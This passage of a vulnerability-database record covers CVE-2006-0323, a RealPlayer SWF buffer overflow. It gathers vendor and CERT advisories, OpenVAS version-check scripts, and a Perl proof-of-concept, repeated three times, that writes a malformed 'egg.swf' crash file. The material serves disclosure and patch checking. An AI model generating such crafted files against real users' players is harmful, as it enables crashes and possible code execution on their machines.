#!/usr/bin/perl\r\n###################################################\r\n#\u00a0RealPlayer:\u00a0Buffer\u00a0overflow\u00a0vulnerability\u00a0/\u00a0PoC\r\n#\r\n#\u00a0CVE-2006-0323\r\n#\u00a0http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-0323\r\n#\r\n#\u00a0RealNetworks\u00a0Advisory\r\n#\u00a0http://service.real.com/realplayer/security/03162006_player/en/\r\n#\r\n#\u00a0Federico\u00a0L.\u00a0Bossi\u00a0Bonin\u00a0\r\n#\u00a0fbossi[at]netcomm.com.ar\r\n###################################################\r\n\r\n#\u00a0Program\u00a0received\u00a0signal\u00a0SIGSEGV,\u00a0Segmentation\u00a0fault.\r\n#\u00a0[Switching\u00a0to\u00a0Thread\u00a0-1218976064\u00a0(LWP\u00a021932)]\r\n#\u00a00xb502eeaf\u00a0in\u00a0CanUnload2\u00a0()\u00a0from\u00a0./plugins/swfformat.so\r\n\r\nmy\u00a0$EGGFILE=\\\\\\"egg.swf\\\\\\";\r\nmy\u00a0$header=\\\\\\"\\\\\\\\x46\\\\\\\\x57\\\\\\\\x53\\\\\\\\x05\\\\\\\\xCF\\\\\\\\x00\\\\\\\\x00\\\\\\\\x00\\\\\\\\x60\\\\\\";\r\n\r\nmy\u00a0$endheader=\\\\\\"\\\\\\\\x19\\\\\\\\xe4\\\\\\\\x7d\\\\\\\\x1c\\\\\\\\xaf\\\\\\\\xa3\\\\\\\\x92\\\\\\\\x0c\\\\\\\\x72\\\\\\\\xc1\\\\\\\\x80\\\\\\\\x00\\\\\\\\xa2\\\\\\\\x08\\\\\\\\x01\\\\\\".\r\n\t\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\\\\\\"\\\\\\\\x00\\\\\\\\x00\\\\\\\\x00\\\\\\\\x00\\\\\\\\x01\\\\\\\\x02\\\\\\\\x00\\\\\\\\x01\\\\\\\\x00\\\\\\\\x00\\\\\\\\x00\\\\\\\\x02\\\\\\\\x03\\\\\\\\x00\\\\\\\\x02\\\\\\".\r\n\t\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\\\\\\"\\\\\\\\x00\\\\\\\\x00\\\\\\\\x00\\\\\\\\x04\\\\\\\\x04\\\\\\\\x00\\\\\\\\x03\\\\\\\\x00\\\\\\\\x00\\\\\\\\x00\\\\\\\\x08\\\\\\\\x05\\\\\\\\x00\\\\\\\\x04\\\\\\\\x00\\\\\\".\r\n\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\\\\\\"\\\\\\\\x00\\\\\\\\x00\\\\\\\\x00\\\\\\\\x89\\\\\\\\x06\\\\\\\\x06\\\\\\\\x01\\\\\\\\x00\\\\\\\\x01\\\\\\\\x00\\\\\\\\x16\\\\\\\\xfa\\\\\\\\x1f\\\\\\\\x40\\\\\\\\x40\\\\\\".\r\n\t\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\\\\\\"\\\\\\\\x00\\\\\\\\x00\\\\\\\\x00\\\\\\";\r\n\r\n\r\nopen(EGG,\u00a0\\\\\\">$EGGFILE\\\\\\")\u00a0or\u00a0die\u00a0\\\\\\"ERROR:$EGGFILE\\\\\\\\n\\\\\\";\r\nprint\u00a0EGG\u00a0$header;\r\n\r\nfor\u00a0($i\u00a0=\u00a00;\u00a0$i\u00a0<\u00a0135;\u00a0$i++)\u00a0{\r\n$buffer.=\u00a0\\\\\\"\\\\\\\\x90\\\\\\";\r\n}\r\n\r\nprint\u00a0EGG\u00a0$buffer;\r\nprint\u00a0EGG\u00a0$endheader;\r\nclose(EGG);\n ", "sourceHref": "https://www.seebug.org/vuldb/ssvid-7738", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-11-19T22:32:01", "description": "No description provided by source.", "cvss3": {}, "published": "2006-03-28T00:00:00", "type": "seebug", "title": "RealPlayer <= 10.5 (6.0.12.1040-1348) SWF Buffer Overflow PoC", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2006-0323"], "modified": "2006-03-28T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-15954", "id": "SSV:15954", "sourceData": "\n #!/usr/bin/perl\n###################################################\n# RealPlayer: Buffer overflow vulnerability / PoC\n#\n# CVE-2006-0323\n# http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-0323\n#\n# RealNetworks Advisory\n# http://service.real.com/realplayer/security/03162006_player/en/\n#\n# Federico L. Bossi Bonin \n# fbossi[at]netcomm.com.ar\n###################################################\n\n# Program received signal SIGSEGV, Segmentation fault.\n# [Switching to Thread -1218976064 (LWP 21932)]\n# 0xb502eeaf in CanUnload2 () from ./plugins/swfformat.so\n\nmy $EGGFILE="egg.swf";\nmy $header="\\x46\\x57\\x53\\x05\\xCF\\x00\\x00\\x00\\x60";\n\nmy $endheader="\\x19\\xe4\\x7d\\x1c\\xaf\\xa3\\x92\\x0c\\x72\\xc1\\x80\\x00\\xa2\\x08\\x01".\n\t "\\x00\\x00\\x00\\x00\\x01\\x02\\x00\\x01\\x00\\x00\\x00\\x02\\x03\\x00\\x02".\n\t "\\x00\\x00\\x00\\x04\\x04\\x00\\x03\\x00\\x00\\x00\\x08\\x05\\x00\\x04\\x00".\n "\\x00\\x00\\x00\\x89\\x06\\x06\\x01\\x00\\x01\\x00\\x16\\xfa\\x1f\\x40\\x40".\n\t "\\x00\\x00\\x00";\n\n\nopen(EGG, ">$EGGFILE") or die "ERROR:$EGGFILE\\n";\nprint EGG $header;\n\nfor ($i = 0; $i < 135; $i++) {\n$buffer.= "\\x90";\n}\n\nprint EGG $buffer;\nprint EGG $endheader;\nclose(EGG);\n\n# milw0rm.com [2006-03-28]\n\n ", "sourceHref": "https://www.seebug.org/vuldb/ssvid-15954", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-11-19T16:10:40", "description": "No description provided by source.", "cvss3": {}, "published": "2014-07-01T00:00:00", "title": "RealNetworks Multiple Products Multiple Buffer Overflow Vulnerabilities", "type": "seebug", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2006-0323"], "modified": "2014-07-01T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-81069", "id": "SSV:81069", "sourceData": "\n source: http://www.securityfocus.com/bid/17202/info\r\n\r\nVarious RealNetworks products are prone to multiple buffer-overflow vulnerabilities.\r\n\r\nThese issues can result in memory corruption and facilitate arbitrary code execution. A successful attack can allow remote attackers to execute arbitrary code in the context of the application to gain unauthorized access.\r\n\r\n#!/usr/bin/perl\r\n###################################################\r\n# RealPlayer: Buffer overflow vulnerability / PoC\r\n#\r\n# CVE-2006-0323\r\n# http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-0323\r\n#\r\n# RealNetworks Advisory\r\n# http://service.real.com/realplayer/security/03162006_player/en/\r\n#\r\n# Federico L. Bossi Bonin \r\n# fbossi[at]netcomm.com.ar\r\n###################################################\r\n\r\n# Program received signal SIGSEGV, Segmentation fault.\r\n# [Switching to Thread -1218976064 (LWP 21932)]\r\n# 0xb502eeaf in CanUnload2 () from ./plugins/swfformat.so\r\n\r\nmy $EGGFILE="egg.swf";\r\nmy $header="\\x46\\x57\\x53\\x05\\xCF\\x00\\x00\\x00\\x60";\r\n\r\nmy $endheader="\\x19\\xe4\\x7d\\x1c\\xaf\\xa3\\x92\\x0c\\x72\\xc1\\x80\\x00\\xa2\\x08\\x01".\r\n\t "\\x00\\x00\\x00\\x00\\x01\\x02\\x00\\x01\\x00\\x00\\x00\\x02\\x03\\x00\\x02".\r\n\t "\\x00\\x00\\x00\\x04\\x04\\x00\\x03\\x00\\x00\\x00\\x08\\x05\\x00\\x04\\x00".\r\n "\\x00\\x00\\x00\\x89\\x06\\x06\\x01\\x00\\x01\\x00\\x16\\xfa\\x1f\\x40\\x40".\r\n\t "\\x00\\x00\\x00";\r\n\r\n\r\nopen(EGG, ">$EGGFILE") or die "ERROR:$EGGFILE\\n";\r\nprint EGG $header;\r\n\r\nfor ($i = 0; $i < 135; $i++) {\r\n$buffer.= "\\x90";\r\n}\r\n\r\nprint EGG $buffer;\r\nprint EGG $endheader;\r\nclose(EGG);\r\n\n ", "sourceHref": "https://www.seebug.org/vuldb/ssvid-81069", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "kaspersky": [{"lastseen": "2023-09-15T19:31:45", "description": "### *Detect date*:\n03/23/2006\n\n### *Severity*:\nCritical\n\n### *Description*:\nA buffer overflow was found in RealNetworks products. By exploiting this vulnerability malicious users can execute arbitrary code. This vulnerability can be exploited remotely via a specially designed SWF file.\n\n### *Affected products*:\nRealPlayer for Windows 10.5 versions from 6.0.12.1040 to 6.0.12.1348 \nRealPlayer for Windows 10 all versions \nRealOne Player for Windows v2 & v1 all versions \nRhapsody for Windows 3 versions from 0.815 to 1.0.269 \nRealPlayer for Mac OS 10 versions from 10.0.0.305 to 10.0.0.331 \nRealOne Player for Mac OS all versions \nRealPlayer for Linux versions from 10.0.0.0 to 10.0.0.6 \nHelix Player for Linux versions from 10.0.0.0 to 10.0.0.5\n\n### *Solution*:\nUpdate to latest version\n\n### *Original advisories*:\n[RealNetworks bulletin](<http://www.service.real.com/realplayer/security/03162006_player/en/>) \n\n\n### *Impacts*:\nACE \n\n### *Related products*:\n[RealPlayer](<https://threats.kaspersky.com/en/product/RealPlayer/>)\n\n### *CVE-IDS*:\n[CVE-2006-0323](<https://vulners.com/cve/CVE-2006-0323>)9.3Critical", "cvss3": {}, "published": "2006-03-23T00:00:00", "type": "kaspersky", "title": "KLA10310 ACE vulnerability in RealNetworks", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": true, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2006-0323"], "modified": "2020-06-03T00:00:00", "id": "KLA10310", "href": "https://threats.kaspersky.com/en/vulnerability/KLA10310/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "freebsd": [{"lastseen": "2023-09-15T17:14:44", "description": "\n\nSecunia Advisories Reports:\n\nA boundary error when processing SWF files can be exploited to\n\t cause a buffer overflow. This may allow execution of arbitrary\n\t code on the user's system.\n\n\n", "cvss3": {}, "published": "2006-03-23T00:00:00", "type": "freebsd", "title": "linux-realplayer -- buffer overrun", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": true, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2006-0323"], "modified": "2006-03-23T00:00:00", "id": "25858C37-BDAB-11DA-B7D4-00123FFE8333", "href": "https://vuxml.freebsd.org/freebsd/25858c37-bdab-11da-b7d4-00123ffe8333.html", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-09-16T16:54:22", "description": "\n\niDefense Reports:\n\nRemote exploitation of a heap-based buffer overflow in\n\t RealNetwork Inc's RealPlayer could allow the execution of\n\t arbitrary code in the context of the currently logged in\n\t user.\nIn order to exploit this vulnerability, an attacker would\n\t need to entice a user to follow a link to a malicious server.\n\t Once the user visits a website under the control of an\n\t attacker, it is possible in a default install of RealPlayer\n\t to force a web-browser to use RealPlayer to connect to an\n\t arbitrary server, even when it is not the default application\n\t for handling those types, by the use of embedded object tags\n\t in a webpage. This may allow automated exploitation when the\n\t page is viewed.\n\n\n", "cvss3": {}, "published": "2006-03-23T00:00:00", "type": "freebsd", "title": "linux-realplayer -- heap overflow", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": true, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2005-2922"], "modified": "2006-03-23T00:00:00", "id": "FE4C84FC-BDB5-11DA-B7D4-00123FFE8333", "href": "https://vuxml.freebsd.org/freebsd/fe4c84fc-bdb5-11da-b7d4-00123ffe8333.html", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "openvas": [{"lastseen": "2017-07-24T12:50:12", "description": "The remote host is missing updates announced in\nadvisory GLSA 200603-24.", "cvss3": {}, "published": "2008-09-24T00:00:00", "type": "openvas", "title": "Gentoo Security Advisory GLSA 200603-24 (RealPlayer)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2006-0323"], "modified": "2017-07-07T00:00:00", "id": "OPENVAS:56552", "href": "http://plugins.openvas.org/nasl.php?oid=56552", "sourceData": "# OpenVAS Vulnerability Test\n# $\n# Description: Auto generated from Gentoo's XML based advisory\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2008 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisories, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"RealPlayer is vulnerable to a buffer overflow that could lead to remote\nexecution of arbitrary code.\";\ntag_solution = \"All RealPlayer users should upgrade to the latest version:\n\n # emerge --sync\n # emerge --ask --oneshot --verbose '>=media-video/realplayer-10.0.7'\n\nhttp://www.securityspace.com/smysecure/catid.html?in=GLSA%20200603-24\nhttp://bugs.gentoo.org/show_bug.cgi?id=127352\nhttp://service.real.com/realplayer/security/03162006_player/en/\";\ntag_summary = \"The remote host is missing updates announced in\nadvisory GLSA 200603-24.\";\n\n \n\nif(description)\n{\n script_id(56552);\n script_version(\"$Revision: 6596 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-07 11:21:37 +0200 (Fri, 07 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2008-09-24 21:14:03 +0200 (Wed, 24 Sep 2008)\");\n script_bugtraq_id(17202);\n script_cve_id(\"CVE-2006-0323\");\n script_tag(name:\"cvss_base\", value:\"9.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_name(\"Gentoo Security Advisory GLSA 200603-24 (RealPlayer)\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2006 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"Gentoo Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/gentoo\", \"ssh/login/pkg\");\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-gentoo.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = ispkgvuln(pkg:\"media-video/realplayer\", unaffected: make_list(\"ge 10.0.7\"), vulnerable: make_list(\"lt 10.0.7\"))) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-07-02T21:10:21", "description": "The remote host is missing an update to the system\nas announced in the referenced advisory.", "cvss3": {}, "published": "2008-09-04T00:00:00", "type": "openvas", "title": "FreeBSD Ports: linux-realplayer", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2006-0323"], "modified": "2016-09-22T00:00:00", "id": "OPENVAS:56446", "href": "http://plugins.openvas.org/nasl.php?oid=56446", "sourceData": "#\n#VID 25858c37-bdab-11da-b7d4-00123ffe8333\n# OpenVAS Vulnerability Test\n# $\n# Description: Auto generated from vuxml or freebsd advisories\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2008 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisories, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"The following package is affected: linux-realplayer\n\nCVE-2006-0323\nBuffer overflow in multiple RealNetworks products and versions\nincluding RealPlayer 10.x, RealOne Player, Rhapsody 3, and Helix\nPlayer allows remote attackers to have an unknown impact via a\nmalicious SWF file (Flash media).\";\ntag_solution = \"Update your system with the appropriate patches or\nsoftware upgrades.\n\nhttp://service.real.com/realplayer/security/03162006_player/en/\nhttp://secunia.com/advisories/19358/\nhttp://www.vuxml.org/freebsd/25858c37-bdab-11da-b7d4-00123ffe8333.html\";\ntag_summary = \"The remote host is missing an update to the system\nas announced in the referenced advisory.\";\n\n\nif(description)\n{\n script_id(56446);\n script_version(\"$Revision: 4128 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2016-09-22 07:37:51 +0200 (Thu, 22 Sep 2016) $\");\n script_tag(name:\"creation_date\", value:\"2008-09-04 20:41:11 +0200 (Thu, 04 Sep 2008)\");\n script_bugtraq_id(17202);\n script_cve_id(\"CVE-2006-0323\");\n script_tag(name:\"cvss_base\", value:\"9.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_name(\"FreeBSD Ports: linux-realplayer\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2006 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"FreeBSD Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/freebsdrel\", \"login/SSH/success\");\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-bsd.inc\");\n\ntxt = \"\";\nvuln = 0;\nbver = portver(pkg:\"linux-realplayer\");\nif(!isnull(bver) && revcomp(a:bver, b:\"10.0.1\")>=0 && revcomp(a:bver, b:\"10.0.7.785.20060201\")<0) {\n txt += 'Package linux-realplayer version ' + bver + ' is installed which is known to be vulnerable.\\n';\n vuln = 1;\n}\n\nif(vuln) {\n security_message(data:string(txt));\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-07-02T21:10:19", "description": "The remote host is missing an update to the system\nas announced in the referenced advisory.", "cvss3": {}, "published": "2008-09-04T00:00:00", "type": "openvas", "title": "FreeBSD Ports: linux-realplayer", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2005-2922"], "modified": "2016-09-22T00:00:00", "id": "OPENVAS:56447", "href": "http://plugins.openvas.org/nasl.php?oid=56447", "sourceData": "#\n#VID fe4c84fc-bdb5-11da-b7d4-00123ffe8333\n# OpenVAS Vulnerability Test\n# $\n# Description: Auto generated from vuxml or freebsd advisories\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2008 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisories, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"The following package is affected: linux-realplayer\n\nCVE-2005-2922\nHeap-based buffer overflow in the embedded player in multiple\nRealNetworks products and versions including RealPlayer 10.x, RealOne\nPlayer, and Helix Player allows remote malicious servers to cause a\ndenial of service (crash) and possibly execute arbitrary code via a\nchunked Transfer-Encoding HTTP response in which either (1) the chunk\nheader length is specified as -1, (2) the chunk header with a length\nthat is less than the actual amount of sent data, or (3) a missing\nchunk header.\";\ntag_solution = \"Update your system with the appropriate patches or\nsoftware upgrades.\n\nhttp://service.real.com/realplayer/security/03162006_player/en/\nhttp://www.idefense.com/intelligence/vulnerabilities/display.php?id=404\nhttp://secunia.com/advisories/19358/\nhttp://www.vuxml.org/freebsd/fe4c84fc-bdb5-11da-b7d4-00123ffe8333.html\";\ntag_summary = \"The remote host is missing an update to the system\nas announced in the referenced advisory.\";\n\n\nif(description)\n{\n script_id(56447);\n script_version(\"$Revision: 4128 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2016-09-22 07:37:51 +0200 (Thu, 22 Sep 2016) $\");\n script_tag(name:\"creation_date\", value:\"2008-09-04 20:41:11 +0200 (Thu, 04 Sep 2008)\");\n script_bugtraq_id(17202);\n script_cve_id(\"CVE-2005-2922\");\n script_tag(name:\"cvss_base\", value:\"9.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_name(\"FreeBSD Ports: linux-realplayer\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2006 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"FreeBSD Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/freebsdrel\", \"login/SSH/success\");\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-bsd.inc\");\n\ntxt = \"\";\nvuln = 0;\nbver = portver(pkg:\"linux-realplayer\");\nif(!isnull(bver) && revcomp(a:bver, b:\"10.0.1\")>=0 && revcomp(a:bver, b:\"10.0.6\")<0) {\n txt += 'Package linux-realplayer version ' + bver + ' is installed which is known to be vulnerable.\\n';\n vuln = 1;\n}\n\nif(vuln) {\n security_message(data:string(txt));\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "cert": [{"lastseen": "2023-05-31T14:42:17", "description": "### Overview\n\nNumerous RealNetworks products are vulnerable to a buffer overflow that may allow a remote attacker to execute arbitrary code on a vulnerable system.\n\n### Description\n\n**RealNetworks RealPlayer**\n\nRealNetworks [RealPlayer](<http://www.real.com/>) is a multimedia application that allows users to view local and remote audio/video content. \n \n**SWF File format** \n \nThe SWF file format is used by Macromedia Flash multimedia files. See the Macromedia [File Format Specification FAQ](<http://www.macromedia.com/licensing/developer/fileformat/faq/>) for more information on the SWF file format. \n \n**The Problem** \n \nNumerous RealNetworks products fail to properly validate SWF files allowing a buffer overflow to occur. By persuading a user to access a specially crafted SWF file with RealPlayer, a remote attacker may be able to execute arbitrary code. \n \n**Considerations** \n \nA complete list of affected software is available in the [RealNetwork Security Update](<http://service.real.com/realplayer/security/03162006_player/en/>) for March 2006. \n \n \n--- \n \n### Impact\n\nBy convincing a user to open a specially crafted SWF file with RealPlayer, a remote unauthenticated attacker can execute arbitrary code on a vulnerable system. \n \n--- \n \n### Solution\n\n**Patch RealPlayer**\n\nApply the patches supplied in the [RealNetwork Security Update](<http://service.real.com/realplayer/security/03162006_player/en/>) for March 2006. \n \n--- \n \n \n**Disable RealPlayer in your web browser** \n \nAn attacker may be able to exploit this vulnerability by embedding the crafted SWF file in a webpage and convincing a user to access that page. Disabling RealPlayer in the web browser will eliminate this attack vector thereby reducing the chances of exploitation. \n \nTo disable RealPlayer in Microsoft Internet Explorer,disable the RealPlayer ActiveX control. In other web browsers, such as Mozilla Firefox, disable the RealPlayer plugin. \n \n--- \n \n### Vendor Information\n\n231028\n\nFilter by status: All Affected Not Affected Unknown\n\nFilter by content: __ Additional information available\n\n__ Sort by: Status Alphabetical\n\nExpand all\n\n**Javascript is disabled. Click here to view vendors.**\n\n### RealNetworks, Inc. __ Affected\n\nUpdated: March 31, 2006 \n\n### Status\n\nAffected\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nSee <http://service.real.com/realplayer/security/03162006_player/en/>.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23231028 Feedback>).\n\n### Red Hat, Inc. __ Affected\n\nUpdated: May 17, 2006 \n\n### Status\n\nAffected\n\n### Vendor Statement\n\nThis issue affected RealPlayer in Red Hat Enterprise Linux Extras 3 and 4. Updated packages are available along with our advisory at the URL below and by using the Red Hat Network 'up2date' tool.\n\n<https://rhn.redhat.com/errata/RHSA-2006-0257.html>\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n \n\n\n### CVSS Metrics\n\nGroup | Score | Vector \n---|---|--- \nBase | | \nTemporal | | \nEnvironmental | | \n \n \n\n\n### References\n\n * <http://service.real.com/realplayer/security/03162006_player/en/>\n * <http://www.macromedia.com/licensing/developer/fileformat/faq/>\n * <http://secunia.com/advisories/19358/>\n * <http://secunia.com/advisories/19362/>\n * <http://secunia.com/advisories/19365/>\n * <http://secunia.com/advisories/19390/>\n\n### Acknowledgements\n\nThis issue was reported in RealNetwork Security Update for March 2006. RealNetworks credits John Heasman of NGSSoftware, Greg MacManus of iDEFENSE Labs, and Sowhat of Nevis Labs with providing information about this vulnerability.\n\nThis document was written by Jeff Gennari.\n\n### Other Information\n\n**CVE IDs:** | [CVE-2006-0323](<http://web.nvd.nist.gov/vuln/detail/CVE-2006-0323>) \n---|--- \n**Severity Metric:** | 10.94 \n**Date Public:** | 2006-03-22 \n**Date First Published:** | 2006-04-01 \n**Date Last Updated: ** | 2006-05-17 12:45 UTC \n**Document Revision: ** | 22 \n", "cvss3": {}, "published": "2006-04-01T00:00:00", "type": "cert", "title": "RealNetworks products vulnerable to buffer overflow via specially crafted flash media file", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": true, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2006-0323"], "modified": "2006-05-17T12:45:00", "id": "VU:231028", "href": "https://www.kb.cert.org/vuls/id/231028", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-05-31T14:42:17", "description": "### Overview\n\nNumerous RealNetworks products are vulnerable to a buffer overflow that may allow a remote attacker to execute arbitrary code on a 